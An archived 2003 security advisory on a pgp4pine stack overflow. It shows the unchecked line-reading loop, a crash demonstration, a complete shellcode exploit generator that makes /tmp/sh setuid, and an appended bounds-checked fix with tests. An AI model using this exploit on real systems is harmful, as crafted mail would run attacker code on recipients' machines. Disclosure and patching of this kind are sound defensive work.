12th Mar 2003 [SBWID-6060]
COMMAND
pgp4pine stack overflow vulnerability
SYSTEMS AFFECTED
current ?
PROBLEM
Eric Auge [[email protected]] found:
I Background:
pgp4pine is a mail encryption/decryption/signature/verification wrapper
to gpg for pine; it is called from pine to parse the mail body and get PGP
information from the file.
more information : http://pgp4pine.flatline.de/
II Problem description:
When installed/configured within pine, pgp4pine parses any incoming mail
before reading (in the default standard configuration), looking for PGP
tokens & information to do the sender's signature verification.
To verify incoming mail it calls:
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
and reads each line according to this loop:
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h: #define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
    fertig=0;
    while (!fertig)
    {
        if ((c=getc(fin))==EOF)
        {
            outFile=inFile; /* this usually is not
                               executed, EOF breaks directly */
            return;
        }
        else if ((readline[i++]=c) == '\n')
        {
            readline[i]='\0';
            fertig=1;
        }
    }
    fertig=0;
    if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
    {
        /* got signed message */
        fclose(fin);
        while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
        fertig=1;
    }
    else if (strncmp("-----BEGIN PGP",readline,14)==0)
    {
        /* got another type of PGP message (encrypted, keys ...) */
        fclose(fin);
        fileDecrypt(inFile,outFile);
        waitForReturn();
        fertig=1;
    }
    else
        i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
If a single line goes over 256 chars directly to EOF, it will overwrite the
saved environment on the stack and return, since there is no check on
the index 'i' within the readline[] array:
[...]
        }
        else if ((readline[i++]=c) == '\n')
        {
[...]
you can go over CONSOLE_IO_LINE_LENGTH and replace the necessary saved
registers before hitting one condition to return.
[...]
        if ((c=getc(fin))==EOF)
        {
            outFile=inFile; /* this usually is not
                               executed, EOF breaks directly */
            return;
        }
[...]
then try:
rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Here it is ;)
Attachment mailex-gen.c (decoded from the base64 MIME part of the original post):

/*
 *  mailex-gen.c -- PGP4Pine exploit mail generator - proof of concept
 *  Copyright (C) 2003 - Eric AUGE
 *
 *   This program is free software; you can redistribute it and/or
 *   modify it under the terms of the GNU General Public License
 *   as published by the Free Software Foundation; either version 2 of
 *   the License or (at your option) any later version.
 *
 *   This program is distributed in the hope that it will be
 *   useful, but WITHOUT ANY WARRANTY; without even the implied
 *   warranty
 *   of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *   GNU General Public License for more details.
 *
 *   You should have received a copy of the GNU General Public
 *   License
 *   along with this program; if not, write to the Free Software
 *   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
 *   02111-1307
 *   USA
 *
 * how poc code works :
 *   $ cp /bin/sh /tmp/sh
 *   $ ls -l /tmp/sh
 *   -rwxr-x---    1 rival    users      680304 Mar 12 15:17 /tmp/sh
 *   $ ./mailex-gen
 *   eip (i use readline[] addr): 0xbfffdbd0
 *   now type: /path/to/pgp4pine-vuln -d -i ./mailme
 *   $ /path/to/pgp4pine-vuln -d -i ./mailme
 *   $ ls -l /tmp/sh
 *   -rwsr-xr-x    1 rival    users      680304 Mar 12 15:17 /tmp/sh
 *
 *
 *   Eric AUGE <eauge@fr.cw.net>
 *
 */

/*
 * NOTE: EIP is hardcoded regarding my own system and tests,
 *       tune it for your needs ;)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define MAXLINESIZE 301
#define SAVED_EIP 0xbfffdbd0
#define NOP 0x90
#define ALIGN 0
#define XFILE "mailme"

/* quick made chmod 4755 /tmp/sh: jmp/call to fetch the path, then
   chmod(path, 04755) via int 0x80, then exit(1) */
unsigned char shellcode[] =
"\xeb\x14\x31\xc0\x34\x0f\x5b\x31\xc9\x66\xb9\xed\x09\xcd\x80"
"\x31\xc0\x40\x89\xc3\xcd\x80\xe8\xe7\xff\xff\xff/tmp/sh";

int main(int argc, char **argv) {

    int i,_sc_size,fd;
    unsigned char buffer[MAXLINESIZE] = "\0";
    char *cptr;

    _sc_size = sizeof(shellcode);

    fprintf(stderr,"eip (i use readline[] addr): %#lx\n", (unsigned long) SAVED_EIP);

    /* fill the whole line with the return address, little-endian, one
       byte at a time (the original stored 4-byte longs in steps of 4 and
       ran 3 bytes past the 301-byte buffer on the last step) */
    for (i = 0; i < MAXLINESIZE ; i++)
        buffer[i] = (SAVED_EIP >> (8 * (i % 4))) & 0xff;

    /* layout of the single 301-byte line, with the shellcode ending at
       byte 256 = CONSOLE_IO_LINE_LENGTH, i.e. right where readline[]
       ends; the 45 bytes after it overwrite the saved frame */
    cptr = (char *) &buffer;
    cptr = cptr + MAXLINESIZE - 45 - _sc_size;

    for ( i = 0; i < _sc_size ; i++ )
        *cptr++ = shellcode[i];

    /* NOP sled in front of the shellcode */
    for ( cptr = (char *) &buffer ; cptr < ((char *)buffer + MAXLINESIZE - 45 - _sc_size) ; cptr++)
        *cptr = NOP;

    /* now lets create the file */
    if ( (fd = open(XFILE, O_CREAT|O_WRONLY|O_TRUNC, S_IRWXU|S_IRGRP|S_IROTH)) == -1) {
        fprintf (stderr,"open() failed!\n");
        exit(1);
    }
    write(fd,&buffer,sizeof(buffer));
    close(fd);
    fprintf(stderr,"now type: /path/to/pgp4pine-vuln -d -i ./mailme\n");

    return (0);
}
III Impact
Since pgp4pine processes any incoming email, sending a specially crafted
email allows the sender to execute arbitrary code on the recipient's box
when the mail is opened.
SOLUTION
?
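No vendor fix is recorded above. As an added example (not pgp4pine's code and not a patch from the project), the following C shows the shape the correction takes: the same scan loop as fileVerifyDecryptMenu(), but with a bounded line reader in place of the unchecked readline[i++]=c, exercised on constructed input that includes the advisory's 500-byte line straight to EOF. The names read_line_bounded, scan_for_pgp, scan_bytes and scan_long_line are this example's own; CONSOLE_IO_LINE_LENGTH is kept at 256 as in defines.h, and the armor prefixes are the two the original loop tests.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same line limit as pgp4pine's defines.h (CONSOLE_IO_LINE_LENGTH). */
#define CONSOLE_IO_LINE_LENGTH 256

/* What the scan decides from the first armor line it sees. */
enum pgp_kind { PGP_NONE = 0, PGP_SIGNED = 1, PGP_OTHER = 2 };

/*
 * Bounded replacement for the unchecked `readline[i++] = c` loop.
 * Reads one line (without its '\n') into buf[cap], always NUL-terminated.
 * Bytes that do not fit are consumed and dropped, never written past buf.
 * Returns 0 for a line that fit, 1 if it was truncated, -1 at EOF with
 * nothing left to read.
 */
static int read_line_bounded(FILE *fin, char *buf, size_t cap)
{
    size_t i = 0;
    int c, truncated = 0;

    while ((c = getc(fin)) != EOF) {
        if (c == '\n')
            break;
        if (i + 1 < cap)
            buf[i++] = (char)c;
        else
            truncated = 1;      /* over-long line: keep consuming, stop storing */
    }
    buf[i] = '\0';
    if (i == 0 && c == EOF)
        return -1;
    return truncated;
}

static int has_prefix(const char *line, const char *prefix)
{
    return strncmp(prefix, line, strlen(prefix)) == 0;
}

/*
 * Scans a mail body the way pgp4pine's loop does, using the bounded reader.
 * A line longer than the buffer cannot be an armor header, so it is treated
 * as a "waste line" and only counted in *long_lines (may be NULL).  A last
 * line without a trailing newline is still classified instead of causing an
 * early return.
 */
enum pgp_kind scan_for_pgp(FILE *fin, int *long_lines)
{
    char readline[CONSOLE_IO_LINE_LENGTH];
    enum pgp_kind kind = PGP_NONE;
    int rc, seen_long = 0;

    while (kind == PGP_NONE &&
           (rc = read_line_bounded(fin, readline, sizeof readline)) != -1) {
        if (rc == 1)
            seen_long++;                          /* too long to be a header */
        else if (has_prefix(readline, "-----BEGIN PGP SIGNED"))
            kind = PGP_SIGNED;
        else if (has_prefix(readline, "-----BEGIN PGP"))
            kind = PGP_OTHER;
    }
    if (long_lines)
        *long_lines = seen_long;
    return kind;
}

/* Runs the scanner over in-memory bytes through a tmpfile(), so it sees a
   plain FILE* exactly as pgp4pine does.  Returns the pgp_kind, or -1 if the
   temporary file could not be created or written. */
int scan_bytes(const unsigned char *data, size_t len, int *long_lines)
{
    FILE *f = tmpfile();
    int kind;

    if (f == NULL)
        return -1;
    if (fwrite(data, 1, len, f) != len) {
        fclose(f);
        return -1;
    }
    rewind(f);
    kind = (int)scan_for_pgp(f, long_lines);
    fclose(f);
    return kind;
}

/* Constructed input: `count` bytes of 'A' (the advisory's perl one-liner)
   followed by `tail`, e.g. "" for the straight-to-EOF crash case. */
int scan_long_line(size_t count, const char *tail, int *long_lines)
{
    size_t tlen = strlen(tail);
    unsigned char *buf = malloc(count + tlen + 1);
    int kind;

    if (buf == NULL)
        return -1;
    memset(buf, 'A', count);
    memcpy(buf + count, tail, tlen);
    kind = scan_bytes(buf, count + tlen, long_lines);
    free(buf);
    return kind;
}

int main(void)
{
    int longs, kind;

    kind = scan_long_line(500, "", &longs);
    printf("500 x 'A' to EOF   : kind=%d long_lines=%d\n", kind, longs);
    kind = scan_long_line(300, "\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n", &longs);
    printf("long line + signed : kind=%d long_lines=%d\n", kind, longs);
    return 0;
}
```

Build with cc -Wall and run it: the 500-byte line is consumed and counted instead of being written past readline[], and an armor header that follows an over-long line is still recognised. The boundary is cap-1 = 255 stored characters, so a 255-character line fits and a 256-character one is flagged.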